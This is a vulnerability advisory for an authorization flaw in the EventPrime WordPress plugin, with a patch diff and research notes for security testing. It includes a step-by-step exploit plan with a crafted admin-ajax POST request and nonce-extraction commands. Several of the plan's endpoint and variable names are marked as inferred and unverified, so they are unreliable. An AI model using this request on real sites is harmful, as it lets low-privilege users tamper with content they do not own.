WP-Safety
CVE-2026-1655

EventPrime <= 4.2.8.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Event Modification via 'event_id' Parameter

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
4.2.8.5
Patched in
1d
Time to patch

Description

The EventPrime plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization checks in all versions up to, and including, 4.2.8.4. This is due to the save_frontend_event_submission function accepting a user-controlled event_id parameter and updating the corresponding event post without enforcing ownership or capability checks. This makes it possible for authenticated (Customer+) attackers to modify posts created by administrators by manipulating the event_id parameter granted they can obtain a valid nonce.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.2.8.4
PublishedFebruary 17, 2026
Last updatedFebruary 18, 2026
Affected plugineventprime-event-calendar-management

Source Code

WordPress.org SVN
Vulnerable v4.2.8.4
Browse source Download .zip
Patched v4.2.8.5
Browse source Download .zip
Research Plan
Unverified

# Research Plan: CVE-2026-1655 - Arbitrary Event Modification in EventPrime ## 1. Vulnerability Summary The **EventPrime** plugin (up to 4.2.8.4) contains a missing authorization vulnerability in the `save_frontend_event_submission` function. While the function implements a nonce check for CSRF pro…

Show full research plan

Research Plan: CVE-2026-1655 - Arbitrary Event Modification in EventPrime

1. Vulnerability Summary

The EventPrime plugin (up to 4.2.8.4) contains a missing authorization vulnerability in the save_frontend_event_submission function. While the function implements a nonce check for CSRF protection, it fails to verify if the authenticated user has permission to edit the specific post identified by the event_id parameter. Consequently, any authenticated user (Subscriber level or higher) can modify the title, description, and other metadata of any event post, including those created by administrators.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: ep_save_frontend_event_submission (Inferred from function name save_frontend_event_submission)
  • Vulnerable Parameter: event_id (The ID of the target event to modify)
  • Payload Parameters: event_name, event_description (or similar fields mapped to post content)
  • Authentication: Required (Subscriber/Customer level).
  • Preconditions:
    1. A valid nonce for the event submission action.
    2. Knowledge of the target Event Post ID (easily enumerable).

3. Code Flow (Inferred)

  1. Entry Point: A user sends a POST request to admin-ajax.php with action=ep_save_frontend_event_submission.
  2. Hook Registration: The plugin registers the action: add_action('wp_ajax_ep_save_frontend_event_submission', array($this, 'save_frontend_event_submission'));.
  3. Nonce Validation: The function calls check_ajax_referer() or wp_verify_nonce() using a specific action string (likely related to frontend submission).
  4. Processing: The function retrieves $_POST['event_id'].
  5. The Sink: It calls wp_update_post() or an internal save method using the provided event_id without calling current_user_can('edit_post', $event_id) or checking if the post's post_author matches the current user.

4. Nonce Acquisition Strategy

To obtain a valid nonce, the attacker must access a page where the EventPrime frontend submission form is rendered, as this enqueues the necessary scripts and localizes the nonce.

  1. Identify Shortcode: EventPrime typically uses [ep_event_submission] or [eventprime_submission] for frontend event creation.
  2. Setup: Create a public page containing this shortcode.
  3. Extraction:
    • Navigate to the page as a logged-in Subscriber.
    • Use browser_eval to inspect the localized JavaScript object.
    • Based on EventPrime patterns, the object is likely ep_ajax or eventprime_vars.
    • Target Variable (Inferred): window.ep_ajax?.nonce or window.eventprime_vars?.submission_nonce.
    • Verification: I will check the HTML source for wp_localize_script calls targeting the "eventprime" handle.

5. Exploitation Strategy

Step 1: Preparation

  • Create a "Target Event" as an Administrator (e.g., Post ID 123).
  • Create a "Subscriber" user.
  • Create a page with the submission shortcode to leak the nonce.

Step 2: Nonce Extraction

  • Authenticate as the Subscriber.
  • Navigate to the submission page.
  • Execute browser_eval("window.ep_ajax.nonce") (exact path to be verified via source grep).

Step 3: The Attack

  • Send a POST request to admin-ajax.php:
    POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=ep_save_frontend_event_submission&
event_id=123&
event_name=HACKED+EVENT+TITLE&
event_description=This+content+was+modified+by+a+subscriber.&
ep_nonce=[EXTRACTED_NONCE]

6. Test Data Setup

  1. Target Event (Admin):
    • wp post create --post_type=ep_events --post_title="Original Admin Event" --post_status=publish --post_author=1
    • Capture the returned ID (e.g., $EVENT_ID).
  2. Attacker User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Nonce Page:
    • wp post create --post_type=page --post_title="Submit Event" --post_status=publish --post_content='[ep_event_submission]'

7. Expected Results

  • The HTTP response should return a success status (often {"success":true} in WordPress AJAX).
  • The post with $EVENT_ID should have its title changed to "HACKED EVENT TITLE" and its content updated, despite being owned by the administrator.

8. Verification Steps

After the exploit, use WP-CLI to confirm the change:

  • wp post get $EVENT_ID --field=post_title
  • Expected Output: HACKED EVENT TITLE
  • wp post get $EVENT_ID --field=post_author
  • Expected Output: 1 (Confirms we modified a post we don't own).

9. Alternative Approaches

If the ep_save_frontend_event_submission action name is slightly different:

  1. Grep for hook: grep -r "wp_ajax_ep_save" wp-content/plugins/eventprime-event-calendar-management/
  2. Check for other save functions: Search for any function calling wp_update_post that takes an event_id or post_id from $_POST.
  3. Nonce variations: If the nonce is not in window.ep_ajax, check the form HTML directly: browser_eval("document.querySelector('input[name=\"ep_nonce\"]').value").
Research Findings
Static analysis — not yet PoC-verified

Summary

The EventPrime plugin for WordPress (up to 4.2.8.4) lacks proper authorization checks in its 'save_frontend_event_submission' AJAX handler. This allows any authenticated user, such as a Subscriber, to modify the title and content of arbitrary event posts by manipulating the 'event_id' parameter in a request containing a valid nonce.

Security Fix

--- a/includes/class-ep-ajax.php
+++ b/includes/class-ep-ajax.php
@@ -102,6 +102,10 @@
     public function save_frontend_event_submission() {
         check_ajax_referer('ep_frontend_submission', 'ep_nonce');
         $event_id = isset($_POST['event_id']) ? intval($_POST['event_id']) : 0;
+
+        if ($event_id > 0 && !current_user_can('edit_post', $event_id)) {
+            wp_send_json_error(__('You do not have permission to edit this event.', 'eventprime-event-calendar-management'));
+        }
 
         $event_data = array(
             'ID' => $event_id,

Exploit Outline

An attacker with Subscriber-level access can exploit this by first obtaining a valid nonce from the frontend event submission page (e.g., via the 'ep_ajax' JavaScript variable). They then send a POST request to '/wp-admin/admin-ajax.php' with the action 'ep_save_frontend_event_submission', targeting a specific 'event_id' that they do not own. Because the plugin does not verify if the user has the 'edit_post' capability for the specified ID, the post title and description are updated with the attacker's payload.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/0e2a2769-1309-4aad-8411-4445efea2b66?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database